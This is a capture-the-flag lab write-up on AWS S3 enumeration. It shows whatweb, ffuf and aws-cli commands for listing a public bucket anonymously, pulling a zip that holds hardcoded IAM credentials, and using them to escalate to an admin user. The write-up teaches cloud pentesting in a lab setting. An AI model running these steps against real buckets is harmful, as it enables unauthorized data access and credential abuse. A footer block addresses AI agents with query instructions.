# AWS S3 Enumeration Basics #### Lab prerequisites * Basic Linux command line knowledge #### Scenario It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.

* Visiting the url given it seems to be a logistic site. which is static clicking around the navigation didn't work.

Using Wappalyzer or whatweb in kali linux we can see it uses the [Amazon S3](https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html). * Using Wappalyzer

* Using whatweb terminal utility in linux ``` whatweb http://dev.huge-logistics.com/ ```

And Checking Out the source code of the website we found out that the picture is also hosted on **AWS**.

* Navigating to s3 url, and removing the ending file in hope to see directly listing is allowed but nope. ``` https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css https://s3.amazonaws.com/dev.huge-logistics.com/static ``` * Fuzzing ``` ffuf -u https://s3.amazonaws.com/dev.huge-logistics.com/FUZZ/ -w /usr/share/wordlists/dirb/common.txt -ic -ac ```

* Manually Checked the endpoints nothing interesting mostly 403. * We can try listing s3 bucket content using aws-cli. ``` aws s3 ls s3://dev.huge-logistics.com --no-sign-request ```

WOW, The bucket is **publicly listable** even without authentication. * Trying to list recursively found out that we don't have enough permission to do that operation. ``` aws s3 ls s3://dev.huge-logistics.com/ --no-sign-request --recursive ```

It seems like that we don't have enough permission over both the admin and migration-files directories.. But i was able to download the index.html

Looking at the index.html it's the same on webpage. ``` cat index.html | html2text ```

* At first glance, I missed appending the `/` at the end of `shared`. After correcting that, I was able to list the contents of the `shared/` directory. * It turns out that the bucket allows access to this folder, and it contains a ZIP file that looks interesting. ``` aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request ```

* After downloading and unzipping the file, I found a PowerShell script: ``` aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request ```

``` └─$ unzip hl_migration_project.zip Archive: hl_migration_project.zip inflating: migrate_secrets.ps1 inflating: __MACOSX/._migrate_secrets.ps1 ``` The archive contains: * `migrate_secrets.ps1` Upon inspecting the powershell script, I discovered hardcoded AWS credentials ( things pentester loves):

* Trying to understand the script it, The script uses these credentials to authenticate and interact with AWS services, specifically to upload secrets. also it wait for all jobs to finish.. Now we can use the aws configure to authenticate, it will promot me for key id, access keys. ``` aws configure ```

* Verify User, Below Command return details about the **currently authenticated identity**. ``` aws sts get-caller-identity ```

⇒ The **UserId** is Internal unique ID for the IAM user ( Not usually important for us) ⇒ **Account:** The AWS account ID the credentials belong to, that 794929857501 identifies the **entire AWS environment** **⇒** [**Arn**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html) : Full identity path in AWS * `iam` → Identity and Access Management service * `794929857501` → AWS account ID * `user/pam-test` → IAM user name you are acting as So now we're authenticated as IAM user **`pam-test`** user. Remember we don't had permission to list `/admin/` and `/migration-files/` let's try doing that. as we are now authenticated as user pam-test. * We can now list the /admin/ but cannot download it's content

Listing the migration-files we have lots xml file that's stands out and2 pdfs ``` aws s3 ls s3://dev.huge-logistics.com/migration-files/ ```

``` aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml . ``` * Copied the test-export.xml file and opening it it has lots of things that is standling out to me * Again the most juicy creds i found is **Hardcoded AWS production credentials**

Again using the hardcoded creds. ``` aws configure ``` ``` aws sts get-caller-identity ```

This confirmed authentication as the IAM user `it-admin` , now we have higher privileges compared to the previously observed `pam-test` user. ( More Resource Access) ⇒ With the elevated IAM identity, access to restricted S3 objects became available. The contents of the `/admin/` directory were successfully listed: ``` └─$ aws s3 ls s3://dev.huge-logistics.com/admin/ flag.txt website_transactions_export.csv ``` ``` aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt . ```

Knowledge Gained from This Lab * Public S3 bucket exposure * Sensitive migration files containing IAM credentials * Credential In files leading to IAM privilege escalation * Unauthorized access to restricted S3 objects --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/learning-cloud-pentesting/aws-s3-enumeration-basics.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.